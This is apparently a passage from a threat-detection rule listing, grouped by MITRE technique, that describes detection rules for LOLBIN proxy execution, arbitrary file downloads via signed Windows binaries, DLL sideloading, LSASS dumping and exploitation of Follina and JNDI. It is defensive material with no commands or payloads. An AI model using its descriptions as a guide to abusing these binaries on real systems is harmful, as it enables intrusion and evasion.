    Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration.
  • AADInternals PowerShell Cmdlets Execution - PsScript - Level: high
    Description: Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.
  • Potential Active Directory Enumeration Using AD Module - PsScript - Level: medium
    Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration.
  • Suspicious Git Clone - Level: medium
    Description: Detects execution of "git" in order to clone a remote repository that contains suspicious keywords
  • AADInternals PowerShell Cmdlets Execution - ProccessCreation - Level: high
    Description: Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.
  • Potential Active Directory Enumeration Using AD Module - ProcCreation - Level: medium
    Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration.
  • PUA - PingCastle Execution - Level: medium
    Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.
  • PUA - PingCastle Execution From Potentially Suspicious Parent - Level: high
    Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level, via a script located in a potentially suspicious or uncommon location.

Top MITRE Techniques

Technique  Count  Rule Title  Count Bar
attack.t1218 150
  • Suspicious CLR Logs Creation - Level: high
    Description: Detects suspicious .NET assembly executions. Could detect use of Cobalt Strike's execute-assembly command.
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction - Level: medium
    Description: Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction - Level: medium
    Description: Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.
  • Monitoring Wuauclt.exe For Lolbas Execution Of DLL - Level: medium
    Description: Adversaries can abuse wuauclt.exe (Windows Update client) to execute code by specifying an arbitrary DLL.
  • Abusing Findstr for Defense Evasion - Level: medium
    Description: Attackers can use findstr to hide their artifacts or search for specific strings and evade defense mechanisms
  • MavInject Process Injection - Level: high
    Description: Detects process injection using the signed Windows tool Mavinject32.exe
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
  • Squirrel Lolbin - Level: medium
    Description: Detects possible use of the Squirrel package manager as a LOLBIN
  • Windows Update Client LOLBIN - Level: high
    Description: Detects code execution via the Windows Update client (wuauclt)
  • Suspicious Esentutl Use - Level: high
    Description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
  • Hidden Flag Set On File/Directory Via Chflags - MacOS - Level: medium
    Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
  • MSI Installation From Web - Level: medium
    Description: Detects installation of a remote MSI file from the web.
  • Suspicious DotNET CLR Usage Log Artifact - Level: high
    Description: Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.
  • Self Extraction Directive File Created In Potentially Suspicious Location - Level: medium
    Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
  • Created Files by Microsoft Sync Center - Level: medium
    Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
  • Legitimate Application Dropped Archive - Level: high
    Description: Detects programs on a Windows system that should not write an archive to disk
  • Legitimate Application Dropped Executable - Level: high
    Description: Detects programs on a Windows system that should not write executables to disk
  • Legitimate Application Dropped Script - Level: high
    Description: Detects programs on a Windows system that should not write scripts to disk
  • Potentially Suspicious Self Extraction Directive File Created - Level: medium
    Description: Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stands for Self Extraction Directive files. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. Usually ".sed" files are simple INI files and not PE binaries.
  • Time Travel Debugging Utility Usage - Image - Level: high
    Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
  • Potential DLL Sideloading Using Coregen.exe - Level: medium
    Description: Detects usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
  • Network Connection Initiated By AddinUtil.EXE - Level: high
    Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
  • Microsoft Sync Center Suspicious Network Connections - Level: medium
    Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
  • Potentially Suspicious Wuauclt Network Connection - Level: medium
    Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
  • Potential RemoteFXvGPUDisablement.EXE Abuse - Level: high
    Description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module - Level: high
    Description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
  • SyncAppvPublishingServer Bypass Powershell Restriction - PS Module - Level: medium
    Description: Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.
  • Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock - Level: high
    Description: Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction - Level: medium
    Description: Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.
  • Suspicious AddinUtil.EXE CommandLine Execution - Level: high
    Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
  • Uncommon Child Process Of AddinUtil.EXE - Level: medium
    Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
  • Uncommon AddinUtil.EXE CommandLine Execution - Level: medium
    Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
  • AddinUtil.EXE Execution From Uncommon Directory - Level: medium
    Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
  • AgentExecutor PowerShell Execution - Level: medium
    Description: Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by the 6th positional argument
  • Suspicious AgentExecutor PowerShell Execution - Level: high
    Description: Detects execution of the AgentExecutor.exe binary, which can be abused as a LOLBIN to execute PowerShell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by the 6th positional argument
  • Uncommon Child Process Of Appvlp.EXE - Level: medium
    Description: Detects uncommon child processes of Appvlp.EXE. Appvlp, or the Application Virtualization Utility, is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.
  • Uncommon Assistive Technology Applications Execution Via AtBroker.EXE - Level: medium
    Description: Detects the start of non built-in assistive technology applications via "Atbroker.EXE".
  • Suspicious Child Process Of BgInfo.EXE - Level: high
    Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • BitLockerTogo.EXE Execution - Level: low
    Description: Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of USB flash drives, SD cards, external hard disk drives and other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application and any usage of it is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
  • Uncommon Child Process Of BgInfo.EXE - Level: medium
    Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Potential Binary Proxy Execution Via Cdb.EXE - Level: medium
    Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
  • DLL Loaded via CertOC.EXE - Level: medium
    Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
  • Suspicious DLL Loaded via CertOC.EXE - Level: high
    Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
  • Potential NTLM Coercion Via Certutil.EXE - Level: high
    Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
  • Potential Arbitrary File Download Via Cmdl32.EXE - Level: medium
    Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
  • Curl Download And Execute Combination - Level: high
    Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
  • Potentially Suspicious CMD Shell Output Redirect - Level: medium
    Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
  • Suspicious Csi.exe Usage - Level: medium
    Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter on the command line. Early versions of this utility provided with the Microsoft "Roslyn" Community Technology Preview were named 'rcsi.exe'
  • Uncommon Child Process Of Defaultpack.EXE - Level: medium
    Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
  • Arbitrary MSI Download Via Devinit.EXE - Level: medium
    Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
  • Potentially Suspicious Child Process Of DiskShadow.EXE - Level: medium
    Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
  • Diskshadow Script Mode - Uncommon Script Extension Execution - Level: medium
    Description: Detects execution of "Diskshadow.exe" in script mode to execute a script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.
  • Diskshadow Script Mode - Execution From Potential Suspicious Location - Level: medium
    Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.
  • Potential Application Whitelisting Bypass via Dnx.EXE - Level: medium
    Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting.
  • Process Memory Dump Via Dotnet-Dump - Level: medium
    Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
  • Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE - Level: medium
    Description: Detects execution of arbitrary DLLs or unsigned code via ".csproj" files via Dotnet.EXE.
  • Binary Proxy Execution Via Dotnet-Trace.EXE - Level: medium
    Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
  • Potentially Over Permissive Permissions Granted Using Dsacls.EXE - Level: medium
    Description: Detects usage of Dsacls to grant over permissive permissions
  • Potential Password Spraying Attempt Using Dsacls.EXE - Level: medium
    Description: Detects possible password spraying attempts using Dsacls
  • New Capture Session Launched Via DXCap.EXE - Level: medium
    Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
  • Potentially Suspicious Cabinet File Expansion - Level: medium
    Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
  • Remote File Download Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
  • Insensitive Subfolder Search Via Findstr.EXE - Level: low
    Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Suspicious ZipExec Execution - Level: medium
    Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
  • Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location - Level: high
    Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.
  • Arbitrary File Download Via IMEWDBLD.EXE - Level: high
    Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
  • InfDefaultInstall.exe .inf Execution - Level: medium
    Description: Executes an SCT script using scrobj.dll from a command entered into a specially prepared INF file.
  • File Download Via InstallUtil.EXE - Level: medium
    Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
  • Import LDAP Data Interchange Format File Via Ldifde.EXE - Level: medium
    Description: Detects the execution of "Ldifde.exe" with the import flag "-i". This can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
  • Uncommon Link.EXE Parent Process - Level: medium
    Description: Detects an uncommon parent process of "LINK.EXE". Link.EXE is the Microsoft incremental linker. It's a utility usually bundled with the Visual Studio installation. Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc.) have a hardcoded call to the "LINK.EXE" binary without checking its validity. This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools gets executed from a different location. By filtering the known locations of such utilities we can spot uncommon parent processes of LINK.EXE that might be suspicious or malicious.
  • Devtoolslauncher.exe Executes Specified Binary - Level: high
    Description: Devtoolslauncher.exe executes another binary
  • DeviceCredentialDeployment Execution - Level: medium
    Description: Detects the execution of DeviceCredentialDeployment to hide a process from view
  • Gpscript Execution - Level: medium
    Description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
  • Ie4uinit Lolbin Use From Invalid Path - Level: medium
    Description: Detects use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories
  • MpiExec Lolbin - Level: high
    Description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary
  • Execute Files with Msdeploy.exe - Level: medium
    Description: Detects file execution using the msdeploy.exe lolbin
  • Execute MSDT Via Answer File - Level: high
    Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
  • OpenWith.exe Executes Specified Binary - Level: high
    Description: OpenWith.exe executes another binary
  • Indirect Command Execution By Program Compatibility Wizard - Level: low
    Description: Detects indirect command execution via Program Compatibility Assistant pcwrun.exe
  • Execute Pcwrun.EXE To Leverage Follina - Level: high
    Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
  • DLL Execution via Rasautou.exe - Level: medium
    Description: Detects use of Rasautou.exe to load an arbitrary DLL specified in the -d option and execute the export specified in -p.
  • REGISTER_APP.VBS Proxy Execution - Level: medium
    Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
  • Lolbin Runexehelper Use As Proxy - Level: medium
    Description: Detects usage of the "runexehelper.exe" binary as a proxy to launch other programs
  • Use of Scriptrunner.exe - Level: medium
    Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
  • Use Of The SFTP.EXE Binary As A LOLBIN - Level: medium
    Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
  • SyncAppvPublishingServer Execute Arbitrary PowerShell Code - Level: medium
    Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
  • SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code - Level: medium
    Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
  • Time Travel Debugging Utility Usage - Level: high
    Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
  • Lolbin Unregmp2.exe Use As Proxy - Level: medium
    Description: Detects usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
  • Use of VisualUiaVerifyNative.exe - Level: medium
    Description: VisualUiaVerifyNative.exe is a Windows SDK binary that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
  • Potential Register_App.Vbs LOLScript Abuse - Level: medium
    Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
  • Potential Suspicious Mofcomp Execution - Level: high
    Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts
  • File Download Via Windows Defender MpCmpRun.EXE - Level: high
    Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
  • Arbitrary File Download Via MSEDGE_PROXY.EXE - Level: medium
    Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
  • Suspicious MSDT Parent Process - Level: high
    Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation
  • Arbitrary File Download Via MSOHTMED.EXE - Level: medium
    Description: Detects usage of "MSOHTMED" to download arbitrary files
  • Arbitrary File Download Via MSPUB.EXE - Level: medium
    Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
  • Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution - Level: medium
    Description: Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory.
  • RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses - Level: high
    Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
  • Arbitrary File Download Via PresentationHost.EXE - Level: medium
    Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
  • XBAP Execution From Uncommon Locations Via PresentationHost.EXE - Level: medium
    Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files and bypass AWL
  • Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution - Level: medium
    Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
  • Abusing Print Executable - Level: medium
    Description: Attackers can use print.exe for remote file copy
  • File Download Using ProtocolHandler.exe - Level: medium
    Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
  • Suspicious Provlaunch.EXE Child Process - Level: high
    Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
  • Potential Provlaunch.EXE Binary Proxy Execution Abuse - Level: medium
    Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution - Level: high
    Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
  • Renamed ZOHO Dctask64 Execution - Level: high
    Description: Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
  • Renamed MegaSync Execution - Level: high
    Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
  • Visual Studio NodejsTools PressAnyKey Renamed Execution - Level: medium
    Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries
  • Sdiagnhost Calling Suspicious Child Process - Level: high
    Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
  • Uncommon Child Process Of Setres.EXE - Level: high
    Description: Detects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
  • Arbitrary File Download Via Squirrel.EXE - Level: medium
    Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
  • Process Proxy Execution Via Squirrel.EXE - Level: medium
    Description: Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
  • Program Executed Using Proxy/Local Command Via SSH.EXE - Level: medium
    Description: Detect usage of the "ssh.exe" binary as a proxy to launch other programs.
  • Execution via stordiag.exe - Level: high
    Description: Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe
  • Potential File Download Via MS-AppInstaller Protocol Handler - Level: medium
    Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE. The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
  • Windows Shell/Scripting Processes Spawning Suspicious Programs - Level: high
    Description: Detects suspicious child processes of Windows shell and scripting processes such as wscript, rundll32, powershell, mshta, etc.
  • Malicious Windows Script Components File Execution by TAEF Detection - Level: low
    Description: The Windows Test Authoring and Execution Framework (TAEF) allows you to run automation by executing test files written in different languages (C, C#, Microsoft COM Scripting interfaces). Adversaries may execute malicious code (such as a WSC file with VBScript, a DLL and so on) directly by running te.exe
  • Malicious PE Execution by Microsoft Visual Studio Debugger - Level: medium
    Description: There is an option for the MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch a specified executable and attach a debugger. This option may be used by adversaries to execute malicious code via a signed, verified binary. The debugger is installed alongside the Microsoft Visual Studio package.
  • Execution via WorkFolders.exe - Level: high
    Description: Detects using WorkFolders.exe to execute an arbitrary control.exe
  • Potential Binary Impersonating Sysinternals Tools - Level: medium
    Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection
  • Verclsid.exe Runs COM Object - Level: medium
    Description: Detects when verclsid.exe is used to run a COM object via GUID
  • Potentially Suspicious Child Process Of VsCode - Level: medium
    Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
  • Potential Binary Proxy Execution Via VSDiagnostics.EXE - Level: medium
    Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
  • Suspicious Vsls-Agent Command With AgentExtensionPath Load - Level: medium
    Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
  • Wlrmdr.EXE Uncommon Argument Or Child Process - Level: medium
    Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag, which allows anything passed to it to be an argument of the ShellExecute API and would therefore allow an attacker to execute arbitrary binaries. This detection also covers any uncommon child processes spawned from "Wlrmdr.exe", as a supplement for those that possess "ParentImage" telemetry.
  • WSL Child Process Anomaly - Level: medium
    Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
  • Proxy Execution Via Wuauclt.EXE - Level: high
    Description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
  • COM Object Execution via Xwizard.EXE - Level: medium
    Description: Detects the execution of the Xwizard tool with the "RunWizard" flag and a GUID-like argument. This utility can be abused in order to run a custom COM object created in the registry.
  • Atbroker Registry Change - Level: medium
    Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG - Level: high
    Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe".
  • Execution DLL of Choice Using WAB.EXE - Level: high
    Description: This rule detects that the path to the DLL written in the registry is different from the default one. When launched, WAB.exe tries to load the DLL from the registry.
  • Potential Devil Bait Malware Reconnaissance - Level: high
    Description: Detects specific process behavior observed with Devil Bait samples
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE - Level: medium
    Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads. Commands such as "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "Rundll32" is also used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.
  • Potential Compromised 3CXDesktopApp Execution - Level: high
    Description: Detects execution of known compromised version of 3CXDesktopApp
  • Potential Suspicious Child Process Of 3CXDesktopApp - Level: high
    Description: Detects potentially suspicious child processes of "3CXDesktopApp.exe", which could be related to the 3CXDesktopApp supply chain compromise
  • Potential Compromised 3CXDesktopApp Update Activity - Level: high
    Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address - Level: medium
    Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft's own IP ranges, which need to be excluded, network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
  • Diskshadow Child Process Spawned - Level: medium
    Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
  • Diskshadow Script Mode Execution - Level: medium
    Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that delete the shadow copies on the system. Investigate the content of the scripts and their location.
  • Potential Proxy Execution Via Explorer.EXE From Shell Process - Level: low
    Description: Detects the creation of a child "explorer.exe" process from a shell-like process such as "cmd.exe" or "powershell.exe". Attackers can use "explorer.exe" to evade defense mechanisms by proxying execution through it. While this is often a legitimate action, this rule can be used to hunt for anomalies. The MuddyWater threat actor was seen using this technique.
  • Potential DLL Sideloading Activity Via ExtExport.EXE - Level: medium
    Description: Detects the execution of "Extexport.exe", a utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. It can be abused as a tool to side-load any DLL. If a folder is provided in the command line, it will load any DLL with one of the following names: "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". Arbitrary DLLs can also be loaded if a specific number of flags were provided.
  • New Self Extracting Package Created Via IExpress.EXE - Level: medium
    Description: Detects the "iexpress.exe" utility creating self-extracting packages. Attackers were seen leveraging "iexpress" to compile packages on the fly via ".sed" files. Investigate the command line options provided to "iexpress" and, in case of a ".sed" file, check its contents and legitimacy.
  • Microsoft Workflow Compiler Execution - Level: medium
    Description: Detects the execution of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
  • Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly - Level: medium
    Description: Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'.
  • Rundll32.EXE Calling DllRegisterServer Export Function Explicitly - Level: medium
    Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
  • Arbitrary Command Execution Using WSL - Level: medium
    Description: Detects potential abuse of the Windows Subsystem for Linux (WSL) binary as a Living off the Land binary in order to execute arbitrary Linux or Windows commands.
attack.t1190 130
Show Rules (130)
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd - Level: high
    Description: Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
  • Django Framework Exceptions - Level: medium
    Description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts
  • Potential JNDI Injection Exploitation In JVM Based Application - Level: high
    Description: Detects potential JNDI Injection exploitation. Often coupled with Log4Shell exploitation.
  • Potential Local File Read Vulnerability In JVM Based Application - Level: high
    Description: Detects potential local file read vulnerability in JVM based apps. If the exceptions are caused by user input and contain path traversal payloads, then it's a red flag.
  • Potential OGNL Injection Exploitation In JVM Based Application - Level: high
    Description: Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCEs such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)
  • Process Execution Error In JVM Based Application - Level: high
    Description: Detects process execution related exceptions in JVM based apps, which often relate to RCE
